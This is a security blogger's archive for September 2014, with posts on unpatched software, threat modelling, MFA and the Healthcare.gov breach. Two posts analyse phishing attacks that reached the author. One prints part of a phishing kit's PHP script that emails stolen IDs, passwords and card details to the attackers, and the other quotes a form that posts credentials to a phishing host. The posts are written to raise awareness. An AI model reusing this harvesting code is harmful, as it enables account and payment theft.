Monthly Archives: September 2014

Software manufacturers have no sense for IT security

27 September 2014

Manufacturers of scientific software could make one’s life really hard. For ease of their own business they make detailed specifications about the software versions required for the operation of their software, e.g. Apache HTTP server version 2.4.2, Tomcat version 7.0.12, Java Version 1.6, Oracle 11.2.0.4 Patchlevel 8 for a 3-tier application. In the worst case they will not offer support if discrepancies are found.

Actually, you have to freeze the system and hope for the next patch or minor release before you can install urgently needed security patches to the operating system, HTTP service, middle ware, etc.

Unfortunately the attack surface of a company increases when unpatched systems and applications are operated inside the company network.

Hilbert curve, first order. Source: Wikipedia

Hilbert curve, first order.

In a well-protected IT system, where all known vulnerabilities are mitigated, the attack surface could be visualized as a first order Hilbert curve. This a curve of limited length. Everything’s under control, the CIO isn’t losing any sleep over the matter.

Hilbert curve, first and second order. Source: Wikipedia

Hilbert curve, first and second order.

Adding an unpatched application system to your network may result in a Hilbert curve of second order.

Hilbert curve, sixth order. Source: Wikipedia

Hilbert curve, sixth order.

Usage of default passwords for your database and file servers could be visualized as Hilbert curve of third order. Operation of lots of unpatched application systems may result in a Hilbert curve of sixth order.

This is a beautiful Picture, but the message is clear:
Nothing’s under control in this environment. 

By adding this vulnerabilities the attack surface, respectively the length of the Hilbert curve, has been increased significantly. And the CIO suffers from sleeplessness.

I often hear from application operators: Don’t panic! Everything will go well because ultimately, we run the systems inside the company network. People from Cologne would say ‘Et hätt noch emmer joot jejange!’ (Constitution of Cologne, Paragraph 3)

Sadly, I can’t share this view. Remind the latest security breach of the Healthcare.gov website. It took a month until the intrusion was detected. This was enough time to attack other systems inside the network. And unpatched systems, which are built upon open source software, are truly worthwhile Targets.

In my opinion, software manufacturers must build their software such, that the dependencies on the underlying software systems are minimized. This will give us the opportunity to mitigate vulnerabilities shortly after they are published.

Moreover, this will cut costs because we do not have to operate such systems in very special security islands.

Have a good weekend.

All Pictures: Source Wikipedia, Hilbert curve

Inside a phishing attack

25 September 2014

I was phished again some days ago. This time I received a well made phishing mail with a request for verifying my Apple account details:

Phishing Mail Browser View

Phishing Mail Browser View

This was a targeted attack because the email was directly sent to my Hotmail account. When viewed on the iPad the email looks like an official email from Apple.

But viewed in Outlook the senders address

Apple . <apple__itunes@outlook.com>

made it clear: This was a phishing attack. Apple would never send such a mail from an outlook.com account.

Fortunately, the attackers provided a copy of the phishing scripts for download from their web service. This offered me the wonderful opportunity to analyze a phishing attempt in detail.

All links in the email point to the same internet address, a server in France, that was compromised by the attackers to cover their tracks. They installed a small script ‘apple.php’ which was used for forwarding to the malicious site. The malicious site is hosted by a provider in Vancouver, Canada.

Phishing Site Login Form

Phishing Site Login Form

This is a really well crafted site in Apple style. But two errors in the address line

[1] http://[2]app-secure-restore.lideresrd.com/APP/ACCOU/RESET/

immediately catch the eye:

[1] Apple would never use the unsecure http protocol for access to site where users have to input their credentials. Standard for those applications is the https protocol.

In my opinion the protocol is the best indicator for identifying a phishing attempt.

As a rule of thumb, the usage of protocol http for user authentication means: You are under attack!

[2] Apple would never use a web service outside the Apple company web for user data verification.

Since we have identified this site as a malicious site, we enter some rubbish and press Continue for the next page. When pressing Continue the html command

<form method="post" action="RESTORE/">

is executed and sub page RESTORE at
http://app-secure-restore.lideresrd.com/APP/ACCOU/RESET/RESTORE/&#8217; is displayed:

Account Verifiacation Details

Account Verifiacation Details

Page RESTORE is created at runtime by a php script. If you press Verify my Information the script is executed again. This time it emails [1]  the data you entered to the attackers and runs script finish.php [2] that forwards you to the Apple store.

<!--?php
 $from_name  = '&iacute;Τunes';
 $from_email  = 'localhost';
 $to_email  = '<Attackers email addresses>';
 $subject  = 'New UK &iacute;Τunes  | '.$_POST['A13'].' ';
[2] $url_redirect = 'finish.php';
 if(isset($_POST) AND !empty($_POST) AND isset($_POST['A9'])){
   require_once("mail.class.php");
   $mail = new mail();
   $mail->emailto  = $to_email;
   $mail->namefrom  = $from_name;
   $mail->emailfrom = $from_email;
   $mail->subject  = $subject;
   $mail->message  = '';   
   $mail->message  .= 'CoT : '.$_POST['A5'].'
'; // payys
   $mail->message  .= 'I : '.$_POST['donnee1'].'
'; //Id
   $mail->message  .= 'P : '.$_POST['donnee2'].'
'; //Pass
  .... more code
   $mail->message  .= 'DRL  : '.$_POST['A13'].'
'; // Sortt
   $mail->message  .= 'CP : '.$_POST['A14'].'
'; // Carpas
   $mail->check  = $_POST['is_valid_email'];
[1]   $mail->send();
   header('location:'.$url_redirect);
 }
 else{
?>

That was a really long journey from Germany via France and Canada to Cupertino.

Take care!

It was just a test server…

20 September 2014

In his post ‘Healthcare.gov breach shows poor website security testing’, published on 11 September 2014, George Leopold talks about the latest security breach of the Healthcare.gov website.

It was just an intrusion on a test server ‘that did not contain consumers’ personal information, no data was transmitted and the Healthcare.gov website was not specifically targeted.’

That sounds to me as if someone wants to downplay the problem, or to sing the bull to sleep. Keep in mind that this test server is also connected to the internal network. Since it took one month to detect the intrusion, it is very likely that the attackers tried to get access to other systems. And it is very likely, that this attacks were not detected yet, or will not be detected at all.

The proposed solution is security testing and, as always, data analytics. In my opinion, this will neither solve the problem, that the default passwords aren’t changed on the test system, nor the problem, that once the server was hijacked the attackers act as internal users or administrators.

PPT - People, Processes, Technology

PPT – People, Processes, Technology

Only the classic PPT approach, which includes measures on the people, processes and technology level, will lead to sustainable change.

For example, a plain checklist for commissioning of servers, that has to be reviewed by another person ( four eyes principle), will solve lots of those problems at nearly no additional costs. If it’s absolutely necessary to invest in new technology decide about Multiple Factor Authorization.

It’s always the same old story…

The Art of Threat Modeling

18 September 2014

Currently I am very busy with hardening of complex applications. As a starting point I develop a threat model of the application system.

Threat models are powerful tools in the design phase of the software development process. They are the basis for the security design of systems and applications. From the threat model vulnerabilities could be identified and mitigation measures could be designed.

If the threat model is refined in the further development process it could be used for verification, validation and test case creation.

To develop a threat model for an existing application system is a complex communication task. In most cases people of different organizations within a company, e.g. IT operations or application development, must be involved.

However, the main challenge is to develop a complete model to find all potential vulnerabilities and risks. Let me clarify this by the means of a simplified model of the web application.

A simplified web application is built of an application service and some data stores. The user communicates through an internet browser with the application service. The application service stores data in a database and on a file share. Thus the building blocks are two data stores, an application process and the browser process on the client computer. In addition we have one data flow from the users browser to the application service and two data flows from the application service to the data stores.

Threat Model Simplified 3 Tier Application System

Threat Model Simplified Three Tier Application System

The picture above shows this simplified threat model created with Microsoft Threat Modeling Tool 2014 (TMT). TMT uses the STRIDE threat model as a basis for threat identification. STRIDE is an acronym for

Spoofing identity,
Tampering with data,
Repudiation,
Information disclosure,
Denial of Service and
Elevation of privilege.

This are commonly used threat categories.

Unfortunately our model is not complete. An attacker would try to bypass the application to get direct access to the data stored in the database and the file share. Thus we have to add two applications and two data flows to our simplified model:

Threat Model Simplified 3 Tier Application System Ext.

Threat Model Simplified Three Tier Application System Extended

TMT generates for each object depending on the object type, e.g. database, application or data flow, threats from the STRIDE categories. This is the main advantage of TMT over manual threat creation because you can focus on the design of mitigation measures.

Threat Model Three Tier System Mitigation

Threat Model Three Tier System Mitigation

You can download TMT from Microsoft download center.

Enjoy!

Webinar: WordPress Security Simplified — Six Easy Steps For a More Secure Website sponsored by Incapsula

15 September 2014

WordPress Security Simplified — Six Easy Steps For a More Secure Website sponsored by Incapsula.

I got this invitation some days ago. This webinar might be a good starting point to dive in the exciting world of application security.

Enjoy!

Google confirms ‘five million’ customer data dump but denies breach

13 September 2014

Google confirms ‘five million’ customer data dump but denies breach – IT News from V3.co.uk.

The news about the Google hack this week were somewhat puzzling at a first glance. Five million customer data stolen but no attack on internal systems? It took me some time to understand this.

In my opinion some hackers collected a large number of accounts from lots of companies, including some Google accounts. From my experience with phishing attacks, and the statements in several reports about the lousy data quality, this sounds quite plausible.

Some statements in post ‘Cleaning up after password dumps’ published by Google’s Spam and Abuse Team on 10 September in its Online Security Blog confirmed my impression:

It’s important to note that in this case and in others, the leaked usernames and passwords were not the result of a breach of Google systems. Often, these credentials are obtained through a combination of other sources.

For instance, if you reuse the same username and password across websites, and one of those websites gets hacked, your credentials could be used to log into the others. Or attackers can use malware or phishing schemes to capture login credentials.

How could we avoid such data theft in the future?

From a technical point of view only Two or Multiple Factor Authentication (MFA) could prevent such attacks. In post Google denies breach after hackers leak millions of user logins published on 11 September in Computerweekly.com, Yiannis Chrysanthou, security researcher in KPMG’s cyber security team, stated, that MFA is the sole means to prevent misuse of stolen credentials.

The last statement in this post was very puzzling:

“Of course this extra security comes with increased investment – but the improved customer protection makes it viable and valuable,” said Chrysanthou.

What increased investment? For usage of Google 2 Step Verification? Or TFA in Apple’s iCloud Services or WordPress.com? There are no additional costs! The only drawback of MFA is loss of comfort for the users of this services. But the gains in security are invaluable. I would be very pleased if Amazon, eBay, and Microsoft would add TFA to their services as soon as possible.

When it comes to implementation of MFA inside of companies we definitely talk about increased investment. Adding MFA to an Active Directory that serves ten thousands of internal users or to a service for external customers will result in an additional investment and higher operation costs. But with TFA the eBay data breach earlier this year would have been prevented. Just as the Code Spaces collapse.

The big question is as always: What is the total loss of turnover created by a data breach compared to the total costs of implementing TFA?

Can Code Spaces tell us?

I am phished!

11 September 2014

During my vacation I got some well made phishing mails. Since an iPad is not the best device for analyzing phishing mails I filed them for further processing at home.

Hotmail Phishing Mail

Hotmail Phishing Mail

It is obvious that this is a phishing email:

  1. The Hotmail Team would never use an email address like someone@fastmail.fm to communicate with customers.
  2. The support team would never notify 113 recipients with a single mail due to privacy reasons.

Normally I drop such mails immediately but sometimes I do some further analysis to keep awareness high.

Thus I clicked the URL and got a very puzzling dialog box in Internet Explorer:

Verify Your Account Dialog

Verify Your Account Dialog

This dialog tells us that phishing will start soon! By now, it should be clear that something is wrong because Outlook will never display a message like this.

Finally, a faked Outlook login page is displayed:

Outlook Login Phishing Site

Outlook Login Phishing Site

Again, it is obvious that this is really well made fake:

  1. The site address is not Outlook.com.
  2. Site access is not secured. The http protocol is used instead of the https protocol.
  3. A Validate button is displayed instead of a Sign in button.

It is this Validate button that sends your login credentials to the phishing site:

form name=”f1″ action=”http://johnbomb.altervista.org/fi.php&#8221; method=”POST” novalidate …

For more details activate menu ‘Developer Tools’ or hit ‘F12’ and use the Inspect function from the context menu.

What do we learn from this?

Phishing mails and sites are easy to recognize. Just be aware of the danger!

Greetings from Delfzijl, The Netherlands

4 August 2014
Pino Tandem

Pino Tandem

We are on a cycling trip through North Germany and the Netherlands.

Most of the time we use well marked long-distance cycling trails, very often along local roads. In particular in The Netherlands these routes are easy to ride.

But when we enter into towns it becomes chaotic. To avoid well-paved bike trails or sometimes short road sections without bike trails along frequently used roads, the route designers guide us across the city, which results very often in long deviations.

But this detours are in general not safer because we have to cross lots of junctions and driveways. In addition, this secondary roads are frequently used by the townsfolk.

If route designers would be familiar with the concept of attack surfaces they would never design cycling trails this way.

It is time that we start transferring concepts developed in computer science to other disciplines like roadway design or urban development to make the world a safer place.

Delfzijl, The Netherlands

Delfzijl, The Netherlands